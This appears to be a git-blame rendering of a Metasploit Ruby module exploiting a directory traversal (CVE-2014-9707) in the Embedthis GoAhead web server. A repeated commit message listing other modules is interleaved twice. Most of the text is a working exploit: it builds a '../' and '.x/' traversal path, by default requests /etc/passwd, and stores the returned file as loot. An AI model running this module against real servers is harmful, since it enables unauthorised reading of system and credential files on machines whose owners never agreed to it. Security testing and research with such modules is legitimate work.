2015-04-07 23:22:06 +00:00
|
|
|
##
|
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
|
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
include Msf::Auxiliary::Scanner
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
Various post-commit fixups
Edited modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb first landed
in #5150, @wchen-r7's DOS module for CVE-2015-1635 HTTP.sys
Edited modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb
first landed in #5192, @joevennix's module for Safari CVE-2015-1126
Edited modules/auxiliary/gather/java_rmi_registry.rb first landed in
Edited modules/auxiliary/gather/ssllabs_scan.rb first landed in #5016,
add SSL Labs scanner
Edited modules/auxiliary/scanner/http/goahead_traversal.rb first landed
in #5101, Add Directory Traversal for GoAhead Web Server
Edited modules/auxiliary/scanner/http/owa_iis_internal_ip.rb first
landed in #5158, OWA internal IP disclosure scanner
Edited modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb
first landed in #5159, WordPress Mobile Edition Plugin File Read Vuln
Edited modules/exploits/linux/http/multi_ncc_ping_exec.rb first landed
in #4924, @m-1-k-3's DLink CVE-2015-1187 exploit
Edited modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb first
landed in #5131, WordPress Slideshow Upload
Edited modules/exploits/windows/local/run_as.rb first landed in #4649,
improve post/windows/manage/run_as and as an exploit
(These results courtesy of a delightful git alias, here:
```
cleanup-prs = !"for i in `git status | grep modules | sed
s/#.*modules/modules/`; do echo -n \"Edited $i first landed in \" && git
log --oneline --first-parent $i | tail -1 | sed 's/.*Land //' && echo
''; done"
```
So that's kind of fun.
2015-05-06 16:39:15 +00:00
|
|
|
'Name' => 'Embedthis GoAhead Embedded Web Server Directory Traversal',
|
2015-04-07 23:22:06 +00:00
|
|
|
'Description' => %q{
|
Various post-commit fixups
Edited modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb first landed
in #5150, @wchen-r7's DOS module for CVE-2015-1635 HTTP.sys
Edited modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb
first landed in #5192, @joevennix's module for Safari CVE-2015-1126
Edited modules/auxiliary/gather/java_rmi_registry.rb first landed in
Edited modules/auxiliary/gather/ssllabs_scan.rb first landed in #5016,
add SSL Labs scanner
Edited modules/auxiliary/scanner/http/goahead_traversal.rb first landed
in #5101, Add Directory Traversal for GoAhead Web Server
Edited modules/auxiliary/scanner/http/owa_iis_internal_ip.rb first
landed in #5158, OWA internal IP disclosure scanner
Edited modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb
first landed in #5159, WordPress Mobile Edition Plugin File Read Vuln
Edited modules/exploits/linux/http/multi_ncc_ping_exec.rb first landed
in #4924, @m-1-k-3's DLink CVE-2015-1187 exploit
Edited modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb first
landed in #5131, WordPress Slideshow Upload
Edited modules/exploits/windows/local/run_as.rb first landed in #4649,
improve post/windows/manage/run_as and as an exploit
(These results courtesy of a delightful git alias, here:
```
cleanup-prs = !"for i in `git status | grep modules | sed
s/#.*modules/modules/`; do echo -n \"Edited $i first landed in \" && git
log --oneline --first-parent $i | tail -1 | sed 's/.*Land //' && echo
''; done"
```
So that's kind of fun.
2015-05-06 16:39:15 +00:00
|
|
|
This module exploits a directory traversal vulnerability in the Embedthis
|
2015-05-06 19:47:08 +00:00
|
|
|
GoAhead Web Server v3.4.1, allowing an attacker to read arbitrary files
|
|
|
|
with the web server privileges.
|
2015-04-07 23:22:06 +00:00
|
|
|
},
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
['CVE', '2014-9707'],
|
|
|
|
['URL', 'http://packetstormsecurity.com/files/131156/GoAhead-3.4.1-Heap-Overflow-Traversal.html']
|
|
|
|
],
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Matthew Daley', # Vulnerability discovery
|
|
|
|
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module
|
|
|
|
],
|
|
|
|
'License' => MSF_LICENSE
|
|
|
|
))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(80),
|
|
|
|
OptString.new('FILEPATH', [true, "The path to the file to read", "/etc/passwd"]),
|
|
|
|
OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 5 ])
|
|
|
|
], self.class)
|
|
|
|
|
|
|
|
deregister_options('RHOST')
|
|
|
|
end
|
|
|
|
|
|
|
|
def run_host(ip)
|
|
|
|
filename = datastore['FILEPATH']
|
|
|
|
filename = filename[1, filename.length] if filename =~ /^\//
|
2015-04-08 05:26:59 +00:00
|
|
|
traversal = "../" * datastore['DEPTH'] << ".x/" * datastore['DEPTH'] << filename
|
2015-04-07 23:22:06 +00:00
|
|
|
|
|
|
|
res = send_request_raw({
|
|
|
|
'method' => 'GET',
|
2015-04-08 05:26:59 +00:00
|
|
|
'uri' => "#{traversal}"
|
2015-04-07 23:22:06 +00:00
|
|
|
})
|
|
|
|
|
|
|
|
if res &&
|
|
|
|
res.code == 200 &&
|
|
|
|
res.headers['Server'] &&
|
|
|
|
res.headers['Server'] =~ /GoAhead/
|
|
|
|
|
|
|
|
print_line("#{res.body}")
|
|
|
|
|
|
|
|
fname = datastore['FILEPATH']
|
|
|
|
|
|
|
|
path = store_loot(
|
|
|
|
'goahead.traversal',
|
|
|
|
'text/plain',
|
|
|
|
ip,
|
|
|
|
res,
|
|
|
|
fname
|
|
|
|
)
|
|
|
|
|
|
|
|
print_good("#{peer} - File saved in: #{path}")
|
|
|
|
else
|
|
|
|
print_error("#{peer} - Nothing was downloaded")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|